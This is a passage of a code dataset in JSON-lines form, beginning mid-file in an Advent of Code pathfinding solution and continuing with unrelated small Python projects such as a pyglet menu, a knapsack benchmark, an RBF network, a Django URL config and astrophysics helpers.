distance\n # and overwrite previous line\n print(f\"Distance: {distance}\", end=\"\\r\")\n\n # check if goal is reached\n # if so, return distance and path\n # otherwise, add neighbors to queue\n if current == goal:\n if visualize:\n plot_path(\"success\", height_map, path, start, goal)\n return distance, path\n\n # add neighbors to queue\n # neighbors are added to queue in order of increasing distance from start\n # this is done by appending to the end of the queue\n for neighbor in get_neighbors(current, height_map):\n # skip if already visited\n if neighbor in visited:\n continue\n\n # mark as visited\n visited.add(neighbor)\n\n # add to queue\n # distance is increased by 1\n # path is extended by neighbor\n queue.append((neighbor, distance + 1, path + [neighbor]))\n\n # plot_path(\"debug\", height_map, path, start, goal)\n # if no path is found, raise ValueError\n # provide distance and neighbors of last visited node\n # check if neighbors have been visited\n debug_message = f\"No path found from {start} to {goal} through height map:\\n\"\n debug_message += f\"Largest distance: {distance}\\n\"\n debug_message += (\n f\"Neighbors of last visited node: {get_neighbors(current, height_map)}\\n\"\n )\n debug_message += f\"Have neighbors been visited?\\n\"\n for neighbor in get_neighbors(current, height_map):\n debug_message += f\"{neighbor}: {neighbor in visited}\\n\"\n debug_message += f\"See debug.png for plot of height map and path.\"\n raise ValueError(debug_message)\n\n\nexample_input = \"\"\"\\\nSabqponm\nabcryxxl\naccszExk\nacctuvwj\nabdefghi\\\n\"\"\"\n\n\ndef solve_a(puzzle_input):\n start, goal, height_map = parse_input(puzzle_input, verbose=True)\n distance, path = path_throguh_map(start, goal, height_map, visualize=True)\n print(\"Shortest path:\")\n print(path)\n print(\"Distance:\", distance)\n return distance\n\n\ndef solve_b(puzzle_input):\n \"\"\"\n Do reverse search from goal to new starting point.\n Candidates for new starting point are all positions with height 0.\n Return the minimum distance.\n \"\"\"\n start, goal, height_map = parse_input(puzzle_input)\n # find all positions with height 0\n # these are the candidates for new starting points\n candidates = np.argwhere(height_map == 0)\n # convert candidates to list of tuples\n candidates = [tuple(candidate.tolist()) for candidate in candidates]\n # save winning candidate\n winning_candidate = None\n # keep track of minimum distance\n min_distance = np.inf\n # keep track of path with minimum distance\n min_distance_path = None\n # give some progress information\n # time how long it takes to find the shortest path\n start_time = time.time()\n print(\"Start search...\")\n for i, candidate in enumerate(candidates):\n # give some progress information\n # overwrite previous line\n print(\n f\"Progress: {i + 1}/{len(candidates)} ({(i + 1) / len(candidates) * 100:.2f}%)\"\n )\n # find path from candidate to goal\n # keep going if path is not found\n try:\n distance, path = path_throguh_map(candidate, goal, height_map)\n except ValueError:\n continue\n # check if distance is smaller than minimum distance\n if distance < min_distance:\n # update minimum distance\n min_distance = distance\n # update path with minimum distance\n min_distance_path = path\n # update winning candidate\n winning_candidate = candidate\n # give some progress information and how long it took\n print(f\"Done in {time.time() - start_time:.2f} seconds.\")\n # plot path\n plot_path(\"success\", height_map, min_distance_path, winning_candidate, goal)\n # 
return maximum distance\n return min_distance\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MDornacher/AdventOfCodeSolutions","sub_path":"aocs/aoc_2022/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33509195772","text":"import pyglet, resources, create_window\nfrom pyglet.sprite import Sprite\nfrom pyglet.text import Label\nfrom create_window import scale_menu\n\nwhereami = 0\noption = 0\nlabel = None\n\ndef active_screen(width, height, batch=None, back=None, front=None):\n\t# Handles which screen is to be loaded depending on the value of whereami\n\tif whereami == 0:\n\t\tactive_screen = main_menu(width, height, batch, back, front)\n\telif whereami == 1:\n\t\tactive_screen = options_menu(width, height, batch, back, front)\n\telif whereami == 2:\n\t\tactive_screen= pause_menu(width, height, batch, back, front)\n\treturn active_screen\n\ndef main_menu(width, height, batch=None, back=None, front=None):\n\t# Loads button sprites used in main menu\n\tstart_button = Sprite(img=resources.start_button, x=width/2, y=height*3/4, batch=batch, group=front)\n\toption_button = Sprite(img=resources.options_button, x=width/2, y=height*2/4, batch=batch, group=front)\n\texit_button = Sprite(img=resources.exit_button, x=width/2, y=height*1/4, batch=batch, group=front)\n\tmenu = [start_button, option_button, exit_button]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef options_menu(width, height, batch=None, back=None, front=None):\n\t# Loads buttons sprites and the label showing resolution in options menu\n\tglobal label\n\tapply_button = Sprite(img=resources.apply_button, x=width*2/5, y=height*1/10, batch=batch, group=front)\n\tback_button = Sprite(img=resources.back_button, x=width*3/5, y=height*1/10, batch=batch, group=front)\n\tleft_res = Sprite(img=resources.left_button, x=width*1/5, y=height/2, batch=batch, group=front)\n\tright_res = Sprite(img=resources.right_button, x=width*4/5, y=height/2, batch=batch, group=front)\n\tlabel = Label(font_name='Comic Sans', \n\t\t font_size=18, x=width/2, y=height/2, anchor_x='center', anchor_y='center', batch=batch)\n\t# Loads the text of the label\n\treslabel(0)\n\tmenu = [apply_button, back_button, left_res, right_res]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef pause_menu(width, height, batch=None, back=None, front=None):\n\t#loads pause menu, background and button sprites\n\tbackground = Sprite(img=resources.pause_menu, x=width/2, y=height/2, batch=batch, group=back)\n\tresume_button = Sprite(img=resources.resume_button, x=width/2, y=height*6/10, batch=batch, group=front)\n\trestart_button = Sprite(img=resources.restart_button, x=width/2, y=height*5/10, batch=batch, group=front)\n\tmenu_button = Sprite(img=resources.menu_button, x=width/2, y=height*4/10, batch=batch, group=front)\n\tmenu = [resume_button, restart_button, menu_button, background]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef reslabel(num):\n\t# changes the resolution label text according to options given,\n\t# by left right arrow in options menu\n\tglobal option, label\n\tif num == 1 and option != 2:\n\t\toption += 1\n\telif num == -1 and option != 0:\n\t\toption -=1\n\telse:\n\t\tif option == 2:\n\t\t\toption = 0\n\t\telse:\n\t\t\toption = 2\n\tif option == 0:\n\t\tlabel.text = \"800x600\"\n\telif option == 1:\n\t\tlabel.text = \"1024x768\"\n\telif option == 2:\n\t\tlabel.text = 
\"1280x1024\"","repo_name":"sotiskot/SlideGame","sub_path":"V4/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41227169091","text":"import time\nimport schedule\nfrom threading import Thread\nimport time\nimport signal\nimport os\nfrom utils import get_data, create_folder\nfrom tqdm import tqdm\nfrom or_algorithm_knapsack import processing_data_or, solver_snapback\nfrom genetic_knapsack import processing_data_genetic_algorithm, run\nimport argparse\n\n\n# You can change time stop in here\nTIME_STOP = 300\nBLACK_LIST_TEST_CASE = ['02000', '05000', '10000']\n\ndef run_OR(TIME_STOP, data):\n print(f'Processing OR Algorithms in {TIME_STOP} seconds')\n for folder_key in data:\n f = open(f'TestResults/{TIME_STOP}_s/OR_{TIME_STOP}s/{folder_key}.txt', 'w')\n f.write('Folder: {}\\n\\n'.format(folder_key))\n print('Folder: {}'.format(folder_key))\n for tmp_data in tqdm(data[folder_key]):\n if tmp_data[1:] in BLACK_LIST_TEST_CASE:\n break\n\n f.write('Numbers of test case: {}\\n'.format(tmp_data[1:]))\n \n counting_test_case = 1\n for idx in data[folder_key][tmp_data]:\n f.write(f'{counting_test_case} times:\\n')\n \n values, weights, capacities = processing_data_or(idx)\n total_weight, computed_value, packed_weights = solver_snapback(values, weights, capacities)\n \n f.write('Total weight: {}\\n'.format(total_weight))\n f.write('Total value: {}\\n'.format(computed_value))\n f.write('Packed_weights: {}\\n\\n'.format(packed_weights))\n\n counting_test_case = counting_test_case + 1\n\n f.close()\n\ndef run_Genetic(TIME_STOP, data):\n print(f'Processing Genetic Algorithms in {TIME_STOP} seconds')\n for folder_key in data:\n f = open(f'TestResults/{TIME_STOP}_s/Genetic_{TIME_STOP}s/{folder_key}.txt', 'w') \n f.write('Folder: {}\\n\\n'.format(folder_key))\n print('Folder: {}'.format(folder_key))\n for tmp_data in tqdm(data[folder_key]):\n if tmp_data[1:] in BLACK_LIST_TEST_CASE:\n break\n \n f.write('Numbers of test case: {}\\n'.format(tmp_data[1:]))\n\n counting_test_case = 1\n for idx in data[folder_key][tmp_data]:\n f.write(f'{counting_test_case} times:\\n')\n\n items , capacities = processing_data_genetic_algorithm(idx)\n bestFitnessValues, totalWeight, totalValue = run(items, capacities)\n\n f.write(f'Best Ever Fitness: {bestFitnessValues}\\n')\n f.write(f'Total Weights: {totalWeight}\\n')\n f.write(f'Total values: {totalValue}\\n\\n')\n\n counting_test_case = counting_test_case + 1\n\n f.close()\n\n\ndef exit_data():\n print('\\nExiting process\\n')\n # sys.exit()\n os.kill(os.getpid(), signal.SIGTERM)\n\ndef exit_data_thread(time_to_exit=TIME_STOP):\n schedule.every(time_to_exit).seconds.do(exit_data)\n while True:\n schedule.run_pending()\n time.sleep(1)\n\nif __name__ == \"__main__\":\n # Create folder test results for or and genetic algorithm\n create_folder('TestResults')\n create_folder(f'TestResults/{TIME_STOP}_s')\n create_folder(f'TestResults/{TIME_STOP}_s/OR_{TIME_STOP}s/')\n create_folder(f'TestResults/{TIME_STOP}_s/Genetic_{TIME_STOP}s/')\n\n # Argparse argument\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-o\", \"--option\", help=\"Choose 1 to run OR Algorithm or 2 to run Genetic Algorithm\", type=int)\n args = parser.parse_args()\n\n # Get data from folder kplib\n print('Get data')\n all_data = get_data('kplib')\n \n\n if args.option == 1:\n # Create a process with TIME_STOP \n Thread(target=exit_data_thread).start()\n 
run_OR(TIME_STOP=TIME_STOP, data=all_data)\n elif args.option == 2:\n Thread(target=exit_data_thread).start()\n run_Genetic(TIME_STOP=TIME_STOP, data=all_data)\n else:\n raise TypeError(\"Only choose 1 or 2 option to run program. You can type python main.py -h to show helping command.\")","repo_name":"anhquan075/CS106-Knapsack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"28698937940","text":"import asyncio\n\nasync def get_html(sleep_times):\n print(\"==========start get url==========\")\n await asyncio.sleep(sleep_times)\n print(\"==========end get url {}s==========\".format(sleep_times))\n\nif __name__ == '__main__':\n '''实现Ctrl+C停止任务'''\n task1=get_html(2)\n task2=get_html(1)\n task3=get_html(3)\n tasks=[task1,task2,task3]\n loop=asyncio.get_event_loop()\n try:\n loop.run_until_complete(asyncio.wait(tasks))\n except KeyboardInterrupt as e: #按Ctrl+C时触发取消任务\n all_tasks=asyncio.Task.all_tasks() #获取所有的task\n for task in all_tasks: #取消所有的任务\n print(\"任务取消:\",task.cancel())\n loop.stop()\n loop.run_forever() #不这么写抛异常\n finally:\n loop.close()","repo_name":"Air-Zhuang/Test35","sub_path":"Thread/coroutine/asyncio_test/asyncio3_cancel.py","file_name":"asyncio3_cancel.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9719024145","text":"#! /usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpi4py import MPI\n\ndef L2Norm (res, ref):\n ref_norm = np.sqrt(np.sum(np.power(ref, 2)))\n error_norm = np.sqrt(np.sum(np.power((ref-res), 2)))\n return error_norm/ref_norm\n\ndef LinfNorm (res, ref):\n ref_norm = np.max(np.abs(ref))\n error_norm = np.max(np.abs(ref-res))\n return error_norm/ref_norm\n \ndef setOverlaps(default_overlap, domain_corners, N_p_d, comm_freq, num_domains, base_overlap, overlap):\n sugested_base_vir_dy = []\n sugested_base_vir_dx = []\n\n for i in range(0, num_domains):\n orig_y = (domain_corners[i][1][0] - domain_corners[i][0][0])\n orig_x = (domain_corners[i][1][1] - domain_corners[i][0][1])\n sugested_base_vir_dy.append(int(np.lcm(orig_y, N_p_d[i][0]) / orig_y))\n sugested_base_vir_dx.append(int(np.lcm(orig_x, N_p_d[i][1]) / orig_x))\n\n base_vir_dy = np.lcm.reduce(sugested_base_vir_dy)\n base_vir_dx = np.lcm.reduce(sugested_base_vir_dx)\n\n vir_dy = []\n vir_dx = []\n for i in range(0, num_domains):\n orig_y = (domain_corners[i][1][0] - domain_corners[i][0][0])\n orig_x = (domain_corners[i][1][1] - domain_corners[i][0][1])\n vir_dy.append(int((orig_y*base_vir_dy) / N_p_d[i][0]))\n vir_dx.append(int((orig_x*base_vir_dx) / N_p_d[i][1]))\n\n max_orig_res_x = 0\n max_orig_res_y = 0\n y_sizes = []\n x_sizes = []\n\n # Recalculating overlps based on constrains and GCD of base and all other resolutions\n overlap_min = default_overlap\n overlap_max = (default_overlap[0]*2,default_overlap[1]*2)\n\n y_lcm = np.lcm.reduce(vir_dy)\n y_overlap_chunk = int(y_lcm / base_vir_dy)\n y_overlap = y_overlap_chunk\n y_chunks = 1\n\n while (y_overlap < overlap_min[0]):\n y_overlap = y_overlap + y_overlap_chunk\n y_chunks = y_chunks + 1\n\n X_lcm = np.lcm.reduce(vir_dx)\n x_overlap_chunk = int(X_lcm / base_vir_dx)\n x_overlap = x_overlap_chunk\n x_chunks = 1\n\n while (x_overlap < overlap_min[1]):\n x_overlap = x_overlap + x_overlap_chunk\n x_chunks = x_chunks + 1\n\n if ((x_overlap > overlap_max[1]) or (y_overlap > 
overlap_max[0])):\n raise Exception(\"Incompatible resolutions with given overlaps constrains\")\n\n base_overlap.append(int(y_lcm / base_vir_dy)*y_chunks)\n base_overlap.append(int(X_lcm / base_vir_dx)*x_chunks)\n\n overlap_mult = 1\n # for i in range(0, num_domains):\n # # Inflating overlaps for comm red\n # if (comm_freq[i] != 1):\n # print(\"Info: doubling the overlaps to alow communication reduction.\")\n # overlap_mult = 2\n\n \n for i in range(0, num_domains):\n curr_overlap_y = int(y_lcm/vir_dy[i]) * y_chunks\n curr_overlap_x = int(X_lcm/vir_dx[i]) * x_chunks\n\n overlap.append((curr_overlap_y*overlap_mult, curr_overlap_x*overlap_mult))\n\ndef show_load_balance(output, backend=\"matplotlib\"): \n if MPI.COMM_WORLD.Get_rank() == 0:\n ranks = MPI.COMM_WORLD.Get_size()\n # bs = 2**(base_pow+max_pow-1)\n # def_Ny_g = 2*bs\n # def_Nx_g = 2*bs\n # plt.imshow(std_output[0]['p_final'])\n # plt.colorbar()\n # plt.show()\n plt.figure()\n bar_data = []\n max_runtime = 0\n for i in range(len(output)):\n rank_data = output[i][\"json_dict\"][\"RankData\"]\n bar_data.append([])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][0].append(data[\"VelocityStepTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][1].append(data[\"VelocityScatTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][2].append(data[\"VelocityGathTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][3].append(data[\"PressureStepTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][4].append(data[\"PressureScatTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][5].append(data[\"PressureGathTime\"])\n \n\n for i in range(len(output)): \n left = np.zeros(ranks)\n for data in bar_data[i]:\n left += data\n if np.max(left) > max_runtime:\n max_runtime = np.max(left)\n \n if backend == \"matplotlib\":\n for i in range(len(output)): \n ax = plt.subplot(len(output), 1, i+1)\n left = np.zeros(ranks)\n width = 0.5\n for data in bar_data[i]:\n p = ax.barh(range(ranks), data, width, left=left)\n left += data\n plt.xlim((0,max_runtime))\n else:\n for i in range(len(output)): \n ax = plt.subplot(len(output), 1, i+1)\n left = np.zeros(ranks)\n unbalance = np.zeros(ranks)\n width = 0.5\n print(\"=======================================\")\n for data in bar_data[i]:\n # print(*(left+data))\n print(*(data))\n min_val = np.min(data)\n print(*(data-min_val))\n print(\"=======================================\")\n left += data\n unbalance += data-min_val\n print()\n print(*(unbalance)) \n print()\n \n\ndef create_domain_corners(orig_corners, decomposition, corners):\n N = (orig_corners[1][0] - orig_corners[0][0], orig_corners[1][1] - orig_corners[0][1])\n\n procs_y = decomposition[0]\n procs_x = decomposition[1]\n \n y_step = int(N[0] / procs_y)\n x_step = int(N[1] / procs_x)\n\n for i in range(procs_y):\n for j in range(procs_x):\n corners.append([(orig_corners[0][0] + i*y_step, orig_corners[0][1] + j*x_step), (orig_corners[0][0] + (i+1)*y_step, orig_corners[0][1] + (j+1)*x_step)])\n return corners\n","repo_name":"Kristian92101/nurts-lfb","sub_path":"lfbutils.py","file_name":"lfbutils.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72143073639","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) code-rgb\n\nfrom pyrogram import Client\nfrom pyrogram import __version__\nfrom pyrogram.raw.all import layer\n\nfrom pyrobot 
import (\n    APP_ID,\n    API_HASH,\n    TG_BOT_TOKEN,\n    TMP_DOWNLOAD_DIRECTORY,\n    LOGGER\n)\n\n\nclass app(Client):\n\n    def __init__(self):\n        name = self.__class__.__name__.lower()\n\n        \n        super().__init__(\n            \":memory:\",\n            plugins=dict(root=\"pyrobot/plugins\"),\n            workdir=TMP_DOWNLOAD_DIRECTORY,\n            api_id=APP_ID,\n            api_hash=API_HASH,\n            bot_token=TG_BOT_TOKEN\n        )\n        \n\n    async def start(self):\n        await super().start()\n\n        usr_bot_me = await self.get_me()\n        LOGGER.info(\n            f\"Reddit-X Bot based on Pyrogram v{__version__} \"\n            f\"(Layer {layer}) started on @{usr_bot_me.username}. \"\n            \"Hi.\"\n        )\n\n    async def stop(self, *args):\n        await super().stop()\n        LOGGER.info(\"Reddit-X Bot stopped. Bye.\")\n","repo_name":"code-rgb/Reddit-x-bot","sub_path":"pyrobot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"25575081196","text":"'''\nLink : https://www.acmicpc.net/problem/2739\nDifficulty : BRONZE-3\nCategory : math, implementation, arithmetic\nTitle : Gugudan (multiplication table)\n'''\n\nimport sys\n\nn = int(sys.stdin.readline().rstrip())\n\nfor i in range(1, 10):\n    print('%d * %d = %d' %(n, i, n*i))","repo_name":"devju94/baekjoon-solutions","sub_path":"solutions/b3_2739.py","file_name":"b3_2739.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38738789798","text":"\"\"\"\nEvents URL configuration.\n\"\"\"\n# NOTE: the '<...>' URL converters below are reconstructed; the originals were\n# stripped as tags during extraction.\nfrom django.urls import path\nfrom .views import EventListView, EventDetailsView, BulkUploadView, AddParticipantToEventView, EventCreateView, \\\n    EventUpdateView\n\nurlpatterns = [\n    path('', EventListView.as_view(), name='event_list'),\n    path('detail/<int:pk>/', EventDetailsView.as_view(), name='event-detail'),\n    path('bulk_upload', BulkUploadView.as_view(), name='bulk_upload'),\n    path('events/<int:event_id>/add-participant/', AddParticipantToEventView.as_view(), name='add_participant'),\n    path('events/create/', EventCreateView.as_view(), name='event-create'),\n    path('events/<int:pk>/update/', EventUpdateView.as_view(), name='event-update'),\n\n\n]","repo_name":"iamgigahex/school-event-registration-v1","sub_path":"event_registration/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"1480899147","text":"import numpy as np\nimport pcn\nimport kmeans\n\nclass rbf:\n    \"\"\"The Radial Basis Function Network\"\"\"\n\n    def __init__(self, inputs, targets, n_rbf, sigma=0, use_kmeans=0,\n                 normalise=0):\n        self.n_in = np.shape(inputs)[1]\n        self.n_out = np.shape(targets)[1]\n        self.n_data = np.shape(inputs)[0]\n        self.n_rbf = n_rbf\n        self.use_kmeans = use_kmeans\n        self.normalise = normalise\n\n        if use_kmeans:\n            self.kmeans_net = kmeans.kmeans(self.n_rbf, inputs)\n\n        self.hidden = np.zeros((self.n_data, self.n_rbf + 1))\n\n        if sigma == 0:\n            # Set the width of Gaussians\n            d = (inputs.max(axis=0) - inputs.min(axis=0)).max()\n            self.sigma = d / np.sqrt(2 * n_rbf)\n        else:\n            self.sigma = sigma\n\n        self.perceptron = pcn.pcn(self.hidden[:, :-1], targets)\n\n        # Initialize the network\n        self.weights1 = np.zeros((self.n_in, self.n_rbf))\n\n    def rbf_train(self, inputs, targets, eta=0.25, n_iterations=100):\n\n        if self.use_kmeans == 0:\n            # Version 1: Set RBFs to be datapoints\n            indices = list(range(self.n_data))  # list() so shuffle works under Python 3\n            np.random.shuffle(indices)\n            for i in range(self.n_rbf):\n                self.weights1[:, i] = inputs[indices[i], :]\n\n        else:\n            # Version 2: 
use k-means\n self.weights1 = np.transpose(self.kmeans_net.kmeanstrain(inputs))\n\n for i in range(self.n_rbf):\n self.hidden[:,i] = np.exp(-np.sum((inputs - np.ones((1,self.n_in))*self.weights1[:,i])**2,axis=1)/(2*self.sigma**2))\n\n if self.normalise:\n self.hidden[:, :-1] /= self.hidden[:, :-1].sum(axis=1).reshape(-1, 1)\n\n # Call Perceptron without bias node\n self.perceptron.pcntrain(self.hidden[:, :-1], targets, eta, n_iterations)\n\n def rbf_fwd(self, inputs):\n\n hidden = np.zeros((np.shape(inputs)[0], self.n_rbf + 1))\n\n for i in range(self.n_rbf):\n hidden[:,i] = np.exp(-np.sum((inputs - np.ones((1,self.n_in))*self.weights1[:,i])**2,axis=1)/(2*self.sigma**2))\n\n if self.normalise:\n hidden[:,:-1] /= hidden[:,:-1].sum(axis=1).reshape(-1, 1)\n\n # Add the bias\n hidden[:,-1] = -1\n\n outputs = self.perceptron.pcnfwd(hidden)\n return outputs\n\n def confmat(self, inputs, targets):\n \"\"\"Confusion Matrix\"\"\"\n\n outputs = self.rbf_fwd(inputs)\n n_classes = np.shape(targets)[1]\n\n if n_classes == 1:\n n_classes = 2\n outputs = np.where(outputs > 0, 1, 0)\n else:\n # 1-of-N encoding\n outputs = np.argmax(outputs, 1)\n targets = np.argmax(targets, 1)\n\n cm = np.zeros((n_classes, n_classes))\n for i in range(n_classes):\n for j in range(n_classes):\n cm[i, j] = np.sum(np.where(outputs==i, 1, 0) * np.where(targets==j, 1, 0))\n\n print(cm)\n print(np.trace(cm) / np.sum(cm))\n","repo_name":"dalmia/Deep-learning-tutorials","sub_path":"Machine learning book/4 - Radial Basis Functions/rbf.py","file_name":"rbf.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"24775395401","text":"import torch\n\n\nclass ReplayBuffer:\n def __init__(self):\n self.buffer = [] # 缓冲区\n\n def push(self, state, action, reward, next_state, done):\n ''' 缓冲区是一个队列,容量超出时去掉开始存入的转移(transition)\n '''\n self.buffer.append((state, action, reward, next_state, done))\n\n def sample(self):\n l_s, l_a, l_r, l_s_, l_done = [], [], [], [], []\n for item in self.buffer:\n s, a, r, s_, done = item\n l_s.append(torch.tensor([s], dtype=torch.float))\n l_a.append(torch.tensor([a], dtype=torch.float))\n l_r.append(torch.tensor([r], dtype=torch.float))\n l_s_.append(torch.tensor([s_], dtype=torch.float))\n l_done.append(torch.tensor([done], dtype=torch.float))\n s = torch.cat(l_s, dim=0)\n r = torch.cat(l_r, dim=0)\n done = torch.cat(l_done, dim=0)\n a = torch.cat(l_a, dim=0)\n # r = torch.cat(l_r, dim=0)\n s_ = torch.cat(l_s_, dim=0)\n self.data = []\n return s, a, r, s_, done\n\n def clear(self):\n self.buffer = []\n self.position = 0\n\n def __len__(self):\n ''' 返回当前存储的量\n '''\n return len(self.buffer)\n","repo_name":"calmzzc/ChengDu_PPO_New","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11864350255","text":"import datetime\nfrom os import getcwd\nimport utils\n\ndef parse_user_info(user_data: dict) -> dict:\n json_path = getcwd() + \"/temp/profile_information/profile_information.json\"\n info = utils.json_file_converter(json_path)\n profile_data = info[\"profile\"]\n user_name = profile_data[\"name\"][\"full_name\"].encode('latin_1').decode('utf8')\n join_year = utils.epoch_to_year(profile_data[\"registration_timestamp\"])\n if \"relationship\" in profile_data:\n relationship_status = profile_data[\"relationship\"][\"status\"].encode('latin_1').decode('utf8')\n if 
\"partner\" in profile_data[\"relationship\"]:\n relationship_status += \" with \" + profile_data[\"relationship\"][\"partner\"]\n relationship_timestamp = utils.epoch_to_year(profile_data[\"relationship\"][\"timestamp\"])\n else:\n relationship_status = \"No data\"\n relationship_timestamp = \"No data\"\n\n # instantiate a list of years [1996, 1997, 1998, ... , 2021]\n current_year = datetime.date.today().year\n year_list = list(range(int(join_year), current_year + 1))\n # instantiate a list of months [January 1996, February 1996, March 1996, ... , December 2021]\n month_list = utils.year_init()\n full_month_list = []\n for year in year_list:\n for month in month_list.keys():\n full_month_list.append(month + \" \" + str(year))\n\n # remove months in the future\n current_month = datetime.date.today().strftime('%m')\n current_month_name = utils.number_to_month_name(current_month)\n current_month_index = full_month_list.index(current_month_name + \" \" + str(current_year))\n full_month_list = full_month_list[:current_month_index]\n\n ex_1 = \"None\"\n ex_2 = \"None\"\n ex_3 = \"None\"\n \n if \"previous_relationships\" in profile_data:\n if len(profile_data[\"previous_relationships\"]) > 0:\n ex_1 = profile_data[\"previous_relationships\"][0][\"name\"]\n if len(profile_data[\"previous_relationships\"]) > 1:\n ex_2 = profile_data[\"previous_relationships\"][1][\"name\"]\n if len(profile_data[\"previous_relationships\"]) > 2:\n ex_3 = profile_data[\"previous_relationships\"][2][\"name\"]\n\n # find number of family member connections on Facebook\n if \"family_members\" in profile_data:\n nbr_of_family_members = len(profile_data[\"family_members\"])\n else:\n nbr_of_family_members = 0\n\n # fill in the info\n user_data[\"user_name\"] = user_name\n user_data[\"join_year\"] = join_year\n user_data[\"year_list\"] = year_list\n user_data[\"month_list\"] = full_month_list\n user_data[\"relationship_status\"] = relationship_status\n user_data[\"relationship_timestamp\"] = relationship_timestamp\n user_data[\"ex#1\"] = ex_1\n user_data[\"ex#2\"] = ex_2\n user_data[\"ex#3\"] = ex_3\n user_data[\"nbr_of_family_members\"] = nbr_of_family_members\n return user_data","repo_name":"Allexio/fb-user-data-analyser","sub_path":"src/parser_profile_info.py","file_name":"parser_profile_info.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"4504009917","text":"#If a string has 'x' repeated 5 times, replace this \"xxxxx\" with \"x5\".\r\n\r\n#The string is compressed only when the repeated character count is more than 1.\r\nfrom sys import stdin\r\n\r\ndef getCompressedString(s) :\r\n\t# Write your code here.\r\n\tn = len(s)\r\n\r\n\t# Declare empty string.\r\n\tanswer = \"\"\r\n\t\r\n\t# Initialize current count of any character in string.\r\n\tcurrentCharCount = 1\r\n\r\n\t# Add first letter of string to answer.\r\n\tanswer += s[0]\r\n\t\r\n\tfor i in range(1, n):\r\n\r\n\t\t# If the current letter is same as previous.\r\n\t\tif s[i] == s[i - 1]:\r\n\t\t\tcurrentCharCount += 1\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tif currentCharCount > 1:\r\n\r\n\t\t\t\t# Add count of letter in answer.\r\n\t\t\t\tanswer += str(currentCharCount)\r\n\t\t\t\tcurrentCharCount = 1\r\n\t\t\t\t\r\n\t\t\tanswer += s[i]\r\n\r\n\tif currentCharCount > 1:\r\n\t\tanswer += str(currentCharCount)\r\n\r\n\t# Return answer.\r\n\treturn answer\r\n\r\n# Main.\r\nstring = stdin.readline().strip();\r\nans = 
getCompressedString(string)\r\nprint(ans)","repo_name":"SumitB007/Python_Course","sub_path":"Strings/compressthestring.py","file_name":"compressthestring.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6014840273","text":"import numpy as np\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom constants import rsun\n\ndef rotation_law(h):\n mass = h.star_mass[0]\n vsurf = 1.5e7\n if mass < 1.2:\n vsurf *= (mass/1.2)**2\n omega = vsurf / (rsun*10**h.log_R)\n return omega\n\ndef tri_area(xs,ys):\n arr = np.ones((3,3))\n arr[0] = xs\n arr[1] = ys\n area = 0.5 * np.linalg.det(arr)\n return area\n\ndef tri_max_length(xs,ys):\n side_lengths = list(((xs[i]-xs[i-1])**2+(ys[i]-ys[i-1])**2)**0.5 for i in range(3))\n return max(side_lengths)\n\ndef find_zams(logl,loglh,model):\n zams=1\n while (loglh[zams] < 1.0*logl[zams]): \n zams=zams+1\n return zams; \n\ndef find_h(dh,center_h1,model):\n zams=1\n while (center_h1[zams] > (center_h1[1] - dh)): \n zams=zams+1\n return zams; \n\ndef find_mams(center_h1,model):\n mams=1\n while (center_h1[mams] > 0.5 * center_h1[1]): \n mams=mams+1\n return mams; \n\ndef find_tams(center_h1,model):\n tams=1\n while (center_h1[tams] > 0.05): \n tams=tams+1\n return tams; \n\ndef find_max(a,b,c,d):\n z= [0] * len(a)\n for i in range(0, len(a)):\n z[i]=max(a[i],b[i],c[i],d[i]) \n return z;\n\ndef find_mid_ms(model,star_age,zams,tams):\n mid_ms=1\n age_ms=(star_age[tams]-star_age[zams])/2\n while (star_age[mid_ms] < age_ms): \n mid_ms=mid_ms+1\n return mid_ms; \n\ndef find_frac_ms(model,star_age,zams,tams,frac):\n frac_ms=1\n age_frac_ms=(star_age[tams]-star_age[zams])*frac\n while ((star_age[frac_ms] - star_age[zams]) < age_frac_ms): \n frac_ms=frac_ms+1\n 